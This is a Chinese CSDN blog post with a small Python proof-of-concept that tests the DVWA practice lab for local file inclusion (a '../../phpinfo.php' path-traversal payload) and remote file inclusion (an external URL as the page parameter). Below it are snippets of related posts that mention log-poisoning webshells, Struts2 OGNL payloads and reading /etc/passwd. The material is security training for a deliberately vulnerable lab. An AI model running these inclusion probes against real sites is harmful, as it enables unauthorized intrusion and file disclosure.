poc练习-dvwa文件包含漏洞

最新推荐文章于 2024-05-27 08:00:00 发布
最新推荐文章于 2024-05-27 08:00:00 发布
阅读量161 收藏
点赞数
分类专栏: poc 文章标签: 数据库 sql python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44248518/article/details/129205483
版权
检验是否存在本地文件包含和远程文件包含
'''
dvwa靶场文件包含漏洞poc
本地包含和远程包含
输出是否有本地包含和远程包含漏洞
url:http://192.168.32.131/dvwa/vulnerabilities/fi/?page=include.php
../../phpinfo.php                   ----本地包含
http://www.baidu.com/robots.txt     -----远程包含
'''

import requests


# 本地包含
def file_include_local(target_url, headers):
    payload = "../../phpinfo.php"
    res = requests.get(target_url + payload, headers=headers)
    if 'PHP Version' in res.text:
        print('存在本地文件包含漏洞')
    else:
        print('不存在本地文件包含漏洞')

# 远程包含
def file_include_remote(target_url, headers):
    payload = "http://www.baidu.com/robots.txt"
    res = requests.get(target_url + payload, headers=headers)
    if 'Baiduspider' in res.text:
        print('存在远程文件包含漏洞')
    else:
        print('不存在远程文件包含漏洞')


if __name__ == '__main__':
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate',
        'Cookie': 'security=low; PHPSESSID=9221f760f951487db236540e2fea458f'
    }
    url = 'http://192.168.32.131/dvwa/vulnerabilities/fi/?page=include.php'
    target_url = url.split('=')[0] + '='
    file_include_local(target_url, headers)
    file_include_remote(target_url, headers)
kuangfreedom
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入pythonpoc_DVWA SQL-injection 附python脚本
weixin_39896256的博客
12-17 390
SQL-Injectionlow等级首先我们将dvwa等级调到low 如图接下来选择SQL Injection,并在提交框中输入正常值1,查看返回结果接下来检测是否存在注入,分别输入 1' and 1=1 1' and 1=2 当我们输入1' and 1=1时,发现报错页面,提示我们语句没有闭合,所以我们输入1' and '1'='1和 1' and '1'='2得到如上回显信息说明存在注入...
POC——DVWA‘s File Upload
weixin_45260839的博客
06-17 202
POC——DVWA's File Upload
文件包含漏洞:pikachu与DVWA靶场中的文件包含漏洞通关
qq_68163788的博客
05-27 1214
文件包含漏洞是一种常见的Web安全漏洞,攻击者可以通过包含恶意文件来执行任意代码或获取敏感信息。在DVWA靶场中,通过利用文件包含漏洞,可以获取系统文件、敏感信息或者执行恶意代码。pikachu可以通过构造恶意文件路径,利用DVWA中的文件包含漏洞来获取管理员权限或者对系统进行攻击。为了防范文件包含漏洞,开发者应该避免直接包含用户输入的文件,并且对输入进行严格的过滤和验证。通过了解和掌握文件包含漏洞的原理和利用方法,可以帮助提高Web应用程序的安全性。
POC——DVWA‘s SQL Injection
weixin_45260839的博客
06-09 273
POC——DVWA's SQL Injection
POC——DVWA‘s File Inclusion
weixin_45260839的博客
06-19 141
POC——DVWA's File Inclusion
s2-001远程执行漏洞靶机练写poc和exp
rlenew的博客
12-03 436
最近在练写poc和exp,在github上的vulhub找到了struts2全系列漏洞,打算复现来练写poc和exp。 安装好环境如下: 在密码框输入poc验证%{1+33} 在bp中抓包得到 探寻tomcat路径 %{“tomcatBinDir{”+@java.lang.System@getProperty(“user.dir”)+"}"} 得到路径获取web路径 %{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response
Some-PoC-oR-ExP:各种漏洞poc、Exp的收集或编写
04-28
在"压缩包子文件的文件名称列表"中提到的"Some-PoC-oR-ExP-master"很可能是一个包含所有PoC和Exp的代码仓库。在这个仓库中,你可能找到不同类型的PoC和Exp,比如针对Web应用的SQL注入PoC,针对操作系统层面的缓冲区...
poc-swagger:[POC]昂首阔步
05-09
标题中的“poc-swagger:[POC]昂首阔步”可能是指一个Proof of Concept(PoC)项目,专门针对Swagger进行的安全测试或漏洞利用。Swagger是一个流行的API开发和文档工具,它允许开发者通过OpenAPI Specification(OAS...
Some-PoC-oR-ExP(各种漏洞poc、Exp的收集或编写)-20210715.zip
08-05
在文件列表中,"Some-PoC-oR-ExP-master"可能是一个主目录,包含了多个子目录或文件,每个代表一个具体的漏洞或一组相关漏洞PoC和Exp。使用者可以通过查阅这些文件,了解具体漏洞的工作原理,学习如何编写PoC和Exp...
护网高危漏洞POC-2024护网高危漏洞POC
最新发布
08-14
最新漏洞POC,护网行动高危POC ⼀、2023HW漏洞POC、EXP(动态更新) ⽹神 SecSSL 3600安全接⼊⽹关系统 任意密码修改漏洞 ⽹神 SecGate 3600 防⽕墙 obj_app_upfile 任意⽂件上传漏洞 某达OA sql注⼊漏洞 CVE-2023-...
poc练习-dvwa靶场sql注入(盲注)
qq_44248518的博客
02-24 322
dvwasql注入pocPython
文件包含漏洞-利用方式
Echo__h的博客
04-26 493
session文件通常保存在temp目录下,文件名格式通常为sess_xxxxx(session id),找到一个可以写入session的点即可利用文件包含漏洞。无法上传php文件时,如果存在文件包含,可以上传符合服务器要求的文件,在文件中写入恶意代码,然后再包含以执行。因此可以将一句话木马写入日志文件,再包含日志文件执行木马。网站存在漏洞但没有合适的上传点时,可以尝试包含日志文件(mysql/ssh/apache等)2)通过burp抓包可以发现,‘
文件包含漏洞总结都在这里了
yuanxu8877的博客
10-20 3089
文件包含漏洞总结,全在这里了
File Inclusion(文件包含)
raynah的博客
06-30 414
File Inclusion(文件包含漏洞)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文...
dvwa没有file1.php,文件包含漏洞-DVWA
weixin_35315373的博客
03-13 357
一、进入DVWA测试系统选择左侧File Inclusion(文件包含)菜单,内容页显示为:解决方法:进入php.ini,将allow_url_include=Off修改为On即可。二、实验步骤:2.1 File Inclusion(Low 级别)a) 分析文件包含漏洞测试网页可以看到,文件包含网页上的内容显示:通过点击file1.php或者file2.php或者file3.php文件,然后通过G...
DVWA-文件包含漏洞
weixin_51706044的博客
05-16 1811
文章目录原理以及介绍一、文件包含二、环境配置三、LOW级别查看源码本地文件包含远程文件包含 原理以及介绍 在通过PHP的相应函数(比如include())引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 文件包含漏洞的形成,需要满足两个条件: include()等函数通过动态变量的方式引入需要包含的文件 用户能够控制这个动态变量 在文件包含漏洞中,进行文件包含时PHP 伪协议的掌握是必不可少的 这里不一一说明,留下大佬的博客可以去借阅学
DVWA文件包含漏洞-(中、高绕过)
weixin_51706044的博客
05-23 600
文章目录一、DVWA SecurityMedium級別二、High Security Level 一、DVWA SecurityMedium級別 设置好难度后,查看源码: 通过对代码分析可以发现这里过滤了一些东西,即是array里面的因此我们需要进行绕过 绕过方法 使用绝对路径或相对路径进行绕过,在这里与低级别中路径一致 http://localhost/DVWA-master/vulnerabilities/fi/?page=/etc/passwd 使用的是 str_replace() 函数,
DVWA靶场通关
..
01-24 3340
Brute Force low等级: 先随便输一下账号密码,在bp抓包发送到intruder模块,先点击清除§。 然后选中下面admin和password的值,点击添加§,表明这是要爆破的点。 选择爆破模式集束炸弹(Clusterbomb),对于这几种模式的区别,可以看一下这篇博客。 burpsuite中intruder模块爆破的四种模式_liweibin812的博客-CSDN博客_burp intruder 模式 转到有效载荷(payload)这个界面,加.
解决 poc-yaml-druid-monitor-unauth 漏洞
07-20
对于解决 poc-yaml-druid-monitor-unauth 漏洞,您可以采取以下步骤: 1. 更新和升级:确保您正在使用的Druid版本是最新的,并应用任何可用的安全补丁。及时更新软件可以解决已知的漏洞。 2. 访问控制:配置Druid...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值